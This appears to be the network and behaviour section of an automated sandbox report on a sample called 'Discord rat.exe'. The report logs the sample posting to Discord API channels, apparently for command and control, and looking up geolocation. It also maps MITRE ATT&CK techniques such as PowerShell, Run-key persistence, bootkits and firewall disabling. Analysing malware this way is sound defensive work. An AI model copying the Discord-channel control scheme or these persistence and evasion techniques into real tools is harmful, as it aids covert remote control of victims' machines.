https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8EgCKqJ3w5Rak1hQuXiNdsTVUCUyL7Yb1vDHwFI-1QOOcySMyDHetOyzrgHb9wFT4z1Aq-4-8UKYeV2JRsKJKG158IewKWN4_gda1zjL7JXBCBlvu6H461uDw-jc12iejb1j3R5OH0XMK9UoXatAhEsJ9ZVD18D_jRiqvInAYdWppigTZ%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3Deaba1274162e123763d2741cb6bf6220&TIME=20240611T190833Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

tls, http2

backgroundTaskHost.exe

2.6kB
9.1kB
20
17

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8EgCKqJ3w5Rak1hQuXiNdsTVUCUyL7Yb1vDHwFI-1QOOcySMyDHetOyzrgHb9wFT4z1Aq-4-8UKYeV2JRsKJKG158IewKWN4_gda1zjL7JXBCBlvu6H461uDw-jc12iejb1j3R5OH0XMK9UoXatAhEsJ9ZVD18D_jRiqvInAYdWppigTZ%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3Deaba1274162e123763d2741cb6bf6220&TIME=20240611T190833Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8EgCKqJ3w5Rak1hQuXiNdsTVUCUyL7Yb1vDHwFI-1QOOcySMyDHetOyzrgHb9wFT4z1Aq-4-8UKYeV2JRsKJKG158IewKWN4_gda1zjL7JXBCBlvu6H461uDw-jc12iejb1j3R5OH0XMK9UoXatAhEsJ9ZVD18D_jRiqvInAYdWppigTZ%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC0zNjUtYmFzaWMtZmFxcyUzZk9DSUQlM2RjbW1sdWMyOWxxOQ%26rlid%3Deaba1274162e123763d2741cb6bf6220&TIME=20240611T190833Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

HTTP Response

204
162.159.135.232:443

https://discord.com/api/v9/guilds/1256666099580403734/channels

tls, http

Discord rat.exe

1.1kB
5.2kB
10
11

HTTP Request

POST https://discord.com/api/v9/guilds/1256666099580403734/channels

HTTP Response

201
159.89.102.253:443

https://geolocation-db.com/json/

tls, http

Discord rat.exe

894 B
4.6kB
10
11

HTTP Request

GET https://geolocation-db.com/json

HTTP Response

301

HTTP Request

GET https://geolocation-db.com/json/

HTTP Response

200
162.159.135.232:443

https://discord.com/api/v9/channels/1257036604460109975/messages

tls, http

Discord rat.exe

1.3kB
3.0kB
9
11

HTTP Request

POST https://discord.com/api/v9/channels/1257036604460109975/messages

HTTP Response

200
23.62.61.194:443

https://www.bing.com/aes/c.gif?RG=196c9d63a3b54bd7a3c9e9000bcc924d&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T190833Z&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373

tls, http2

backgroundTaskHost.exe

1.4kB
5.3kB
16
12

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=196c9d63a3b54bd7a3c9e9000bcc924d&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T190833Z&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373

HTTP Response

200
162.159.135.232:443

https://discord.com/api/v9/channels/1257036604460109975/messages

tls, http

Discord rat.exe

1.1kB
2.8kB
8
9

HTTP Request

POST https://discord.com/api/v9/channels/1257036604460109975/messages

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls

25.3kB
690.3kB
514
510
150.171.27.10:443

tse1.mm.bing.net

tls

1.2kB
6.9kB
15
13
162.159.135.232:443

discord.com

tls

1.2kB
2.9kB
10
11
162.159.135.232:443

discord.com

tls

1.0kB
381 B
7
5
162.159.135.232:443

discord.com

tls

979 B
381 B
6
5
162.159.135.232:443

discord.com

tls

595 B
287 B
5
4
162.159.135.232:443

discord.com

tls

595 B
287 B
5
4
162.159.138.232:443

discord.com

tls

641 B
287 B
6
4
162.159.138.232:443

discord.com

tls

1.2kB
2.8kB
10
9
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
10
11
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
10
11
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.2kB
2.8kB
10
9
162.159.138.232:443

discord.com

tls

1.6kB
2.8kB
11
8
162.159.138.232:443

discord.com

tls

1.3kB
2.8kB
11
9
162.159.138.232:443

discord.com

tls

1.2kB
2.8kB
9
9
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
10
11
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
10
10
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
10
11
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.3kB
2.9kB
11
11
162.159.138.232:443

discord.com

tls

1.2kB
2.8kB
9
9
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
11
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.4kB
3.1kB
13
12
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.3kB
2.9kB
11
10
162.159.138.232:443

discord.com

tls

1.2kB
2.8kB
10
9
162.159.138.232:443

discord.com

tls

1.3kB
2.9kB
11
10
162.159.138.232:443

discord.com

tls

1.3kB
3.1kB
11
12
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
11
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
10
11
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
10
11
162.159.138.232:443

discord.com

tls

1.2kB
2.9kB
9
10

8.8.8.8:53

gateway.discord.gg

dns

Discord rat.exe

64 B
144 B
1
1

DNS Request

gateway.discord.gg

DNS Response

162.159.134.234

162.159.135.234

162.159.133.234

162.159.130.234

162.159.136.234
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

Dnscache

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

Dnscache

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

Discord rat.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.109.133

185.199.111.133

185.199.110.133

185.199.108.133
8.8.8.8:53

g.bing.com

dns

Dnscache

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

234.134.159.162.in-addr.arpa

dns

Dnscache

74 B
136 B
1
1

DNS Request

234.134.159.162.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

Dnscache

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

Dnscache

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

Dnscache

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

discord.com

dns

Discord rat.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.135.232

162.159.137.232

162.159.136.232

162.159.128.233

162.159.138.232
8.8.8.8:53

geolocation-db.com

dns

Discord rat.exe

128 B
80 B
2
1

DNS Request

geolocation-db.com

DNS Request

geolocation-db.com

DNS Response

159.89.102.253
8.8.8.8:53

20.160.190.20.in-addr.arpa

dns

Dnscache

72 B
158 B
1
1

DNS Request

20.160.190.20.in-addr.arpa
8.8.8.8:53

232.135.159.162.in-addr.arpa

dns

Dnscache

74 B
136 B
1
1

DNS Request

232.135.159.162.in-addr.arpa
8.8.8.8:53

253.102.89.159.in-addr.arpa

dns

Dnscache

73 B
140 B
1
1

DNS Request

253.102.89.159.in-addr.arpa
8.8.8.8:53

194.61.62.23.in-addr.arpa

dns

Dnscache

71 B
135 B
1
1

DNS Request

194.61.62.23.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

Dnscache

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

107.12.20.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

107.12.20.2.in-addr.arpa
8.8.8.8:53

80.90.14.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

80.90.14.23.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

10.27.171.150.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.27.171.150.in-addr.arpa
8.8.8.8:53

24.73.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

24.73.42.20.in-addr.arpa
8.8.8.8:53

discord.com

dns

Discord rat.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.138.232

162.159.128.233

162.159.136.232

162.159.137.232

162.159.135.232
8.8.8.8:53

232.138.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.138.159.162.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery